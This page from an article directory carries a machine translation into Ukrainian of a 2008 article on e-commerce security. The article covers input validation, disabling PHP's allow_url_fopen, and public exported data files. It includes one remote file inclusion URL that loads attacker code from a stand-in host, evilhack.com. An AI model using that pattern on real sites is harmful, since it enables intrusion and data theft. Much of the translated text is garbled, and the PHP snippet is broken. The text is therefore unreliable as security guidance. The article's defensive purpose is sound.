The following content has been automatically translated by close 
E-комерції - Підключення дірок в безпеці | Електронна торгівля "статті
Статті сфері Logo

E-комерції - Підключення дірок в безпеці

Експерт Автор: Пол Робертс | статті Анотація
Word Count: 520 слів | Переглядів: 157 перегляду (ів)
Безпека електронної комерції сайт повинен бути один з основних моментів при розробці сайту E-комерція або програмного забезпечення. Розробник повинен бути в курсі всіх міркувань безпеки при розробці сайту. З електронної торгівлі все більше поширення в ці дні, число атак, безумовно, зростає. Параноя це здорова річ для електронної комерції Розробники сайту, ми повинні тримати у ворота з питаннями безпеки, і тримати наші очі і вуха відкритими. Хоча такі серйозні лазівки, такі лазівки, якщо цієї легко виправлені.

Нижче перераховані деякі міркування безпеки повинні бути включені при розробці сайту. Дана стаття не поширюється на E-крадіжки, будь ласка, див. мою окрему статтю з цього питання.

Введення користувача - введення кожного, будь то вступаємо в кількості, пошук продуктів, ввівши ім'я і т.д., повинні бути перевірені на підозрілі символи. Якщо цього не зробити, то можна ввести "?>", закриття кінця тегів PHP і виконувати деякий код PHP.

Набагато безпечніше дозволити цифр і букв AZ (столиць включений) і 0-9, і більше нічого, ніж зробити список всіх символів, які не повинні бути там. Перевірка сценарію необхідно, щоб перегорнути кожного символу по одному. Це має бути досягнуто використанням перевірки автентичності сервера в сторону, а не JavaScript. За допомогою серверних перевірки вхідних даних необхідна для захисту від небажаної символи

Там існує інша основним під час виконання PHP-коду. При використанні PHP є параметр називається allow_url_fopen який дозволить відкриття файлів із сценаріїв PHP. Ця опція повинна бути відключена, якщо не абсолютно необхідно.

Тільки уявіть, у вас є PHP скрипти для фіксованих верхніх і нижніх колонтитулів, а також для доступу до веб-сторінок вам потрібно набрати в http://www.mysite.com/index.php?page=page2. Все що потрібно це зловмисникові запускати сценарій, змінюючи ці параметри, ввівши "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" з PHP код у файлі "hacker.txt". Ви могли б що-небудь трапиться, PHP файлу читати, видалені життєво важливі вкрадена інформація.

Якщо ви не впевнені, якщо цей параметр включений або виключений, необхідно скопіювати наступний код PHP в текстовий файл та завантажте його на свій веб-сервер:

phpinfo ();
?>

При доступі до скрипт на вашому веб-сервері, ви повинні прийти через настроювання конфігурації під allow_url_fopen.

Користувач комп'ютера, за нормальних обставин не може знайти значення цього параметра.

Будьте обережні з експортовані дані, як замовлення, продукція в CSV і MySQL файлів. Якщо ці дані експортуються з сценарію і зберігається на веб-сервері під загальною тобто ім'я файлу. http://www.mysite.com/admin/output_tables.csv. Це тільки дійсно проблема, коли експортувала дані зберігаються у файлі в директорії, яка є загальнодоступною. Існує два способи запобігти цій лазівку безпеки - спочатку у вихідному файлі за паролем каталогів, по-друге, є дані, розташовані всередині форми HTML Textarea елемент сценарію. Власник магазину, можна скопіювати цю інформацію з текстових файлів і створити новий файл на свій комп'ютер і вставте в них відомості.

Все що потрібно це хакерів, щоб знайти цей файл, перевіряючи електронну демо-сайт торгово програмного забезпечення і подивитися на той же файл на реальному сайті.
Пол Робертс

Про автора / автора Bio

Пол Робертс
Я біжу розробник програмного забезпечення, що спеціалізується на електронної комерції, пошукова оптимізація та оцінка програмного забезпечення для друку називається ROBO дизайнерських рішень. Я також розробити Нової Зеландії електронна комерція рішень і програмного забезпечення під назвою ROBO Design.

Article Source: http://www.uk.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 157 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
Як захистити комп'ютер Secure
Як перевірити параметри безпеки в Windows Vista

Подробнее "Електронна торгівля" Статті

Нижче перераховані інші статті, пов'язані з вищевказаної статті зі статті "Електронна торгівля" категорію.

Люди, які цікавляться в вищевказаної статті "Е-комерції - Підключення дірок в безпеці", також зацікавлені у відповідних статтях, перерахованих нижче:

Запуск електронної комерції це не тільки підтримку вашого сайту і працює. Клієнти покладаються на вашу здатність служити їм по телефону, факсом, електронною поштою або іншими засобами, і це вимагає від усіх ваших систем, працює щоб мати можливість виконувати запити клієнтів.
Ще кілька днів тому я був поговорити з моїм другом. Він святкував 1 день народження дитини, і довелося тікати від свого рідного штату Керала і Ченнаї, його робоче місце. Він і його краща половина подорожував між цими місцями як мінімум 4 рази на останній місяць.
Якщо ви вже робите електронної торгівлі для будь-якого проміжку часу, ви б знали, що є більше, ніж scamers справжнього оптових постачальників служб каталогів Dropship. У світі електронного бізнесу, Salehoo і світових брендів, є авторитетними постачальниками послуг, які набули велику популярність в останні кілька років.
Якщо ви коли-небудь були роздрібний інтернет-продавець, можливо, ви вже чули про Salehoo або навіть використовував його у своїх інтересах. Якщо ви тільки починаєте з вашим бізнесом, можна було сплутати з змішані Salehoo відгуки там. Тепер, давайте поглянемо на те, що Salehoo це дійсно все, і про пропоновані ними послуги яких багато хто забуває.
Скільки людей ви знаєте, що придбали щось в Інтернеті? Якщо, як я досить мало, тому "Електронна торгівля є новим онлайн Mall у світі покупок. Але хто працює цих онлайнових магазинів? Люди, як ви і я, ось чому цей бізнес перебуває на підйомі і буде продовжувати рости сьогодні і в майбутньому.
Якщо ви великий шанувальник новітніх електронних продуктів, то може виникнути спокуса ідеєю ведення власного онлайн бізнесу електроніки. Це не так складно отримати, коли ви почали приймати повною мірою використовувати права Drop Shipping електроніка послуги і є велике вам на вибір.
Ви коли-небудь у вашому місцевому магазині зручність і гадати, що було б, якщо він належав? Хочете бути добрий господар, будуть люди, як ти? Ну ця стаття покаже вам переваги власного онлайн магазину роздрібної торгівлі, або широко відомий як електронна комерція, яка відрізняється від реального місцевого магазину зручності.
Статті Directory Home Всі категорії Інтернет та E-Business Електронна торгівля

Не вдається знайти те, що ви шукаєте? Спробуйте Google!
Copyright © 2005 -- Ларрі Lim, Сінгапур - стаття пошукових каталогу на ArticleSphere.com ™
Всі права захищені по всьому світу. Усі товарні знаки і знаки обслуговування є власністю відповідних власників.

Африкаанс Албанська Арабська Білоруська Болгарська Каталонська Китайська (спрощена) Китайська (традиційна) Хорватська Чеська Данська Німецька Англійська Естонська Філіппінська Фінська Французька Галісійська Грецький Іврит Гінді Угорська Ісландська Індонезійська Ірландська Italiano Японська Корейська Латвійська Литовська Македонська Малайська Мальтійська Голландська Норвезька Перська Польська Португальська Румунська Російська Сербська Словацька Словенська Іспанська Суахілі Шведська Тайська Турецька Українська Вєтнамська Валлійська Ідиш